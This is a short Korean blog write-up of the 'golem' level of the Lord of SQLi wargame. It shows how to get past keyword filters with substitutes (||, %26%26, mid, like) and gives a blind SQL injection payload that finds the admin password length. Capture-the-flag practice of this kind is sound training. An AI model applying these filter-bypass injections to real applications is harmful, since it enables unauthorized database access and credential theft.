![[LOS] golem 풀이 (st.11)](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fd0VZ7E%2FbtqEvw7dbG7%2FAx5VPBKfoLFdyDeLiObkkk%2Fimg.png)
풀이
똑같은 Blind SQLi지만, or, and, substr, =를 필터링하는 문제이다.
or -> ||
and -> %26%26
substr -> mid
= -> like
로 바꿔서 Query문을 수정하자.
먼저 pw의 길이를 알아내자.
Query: ?pw=1' || id like 'admin' %26%26 length(pw) like 8%23
pw의 길이는 부등호를 사용하면 알아내기 쉽다.
이제 pw의 길이를 알았으니, 파이썬을 이용해 값을 알아내보자.
코드는 다음과 같다. 대소문자에 유의하자.
'Wargame > LOS' 카테고리의 다른 글
| [LOS] vampire 풀이 (st.9) (0) | 2020.05.29 |
|---|---|
| [LOS] nightmare 풀이 (st.18) (0) | 2020.05.29 |
| [LOS] darkknight 풀이 (st.12) (0) | 2020.05.29 |
| [LOS] wolfman 풀이 (st.5) (0) | 2020.05.29 |
| [LOS] ORGE 풀이 (st.7) (0) | 2020.05.29 |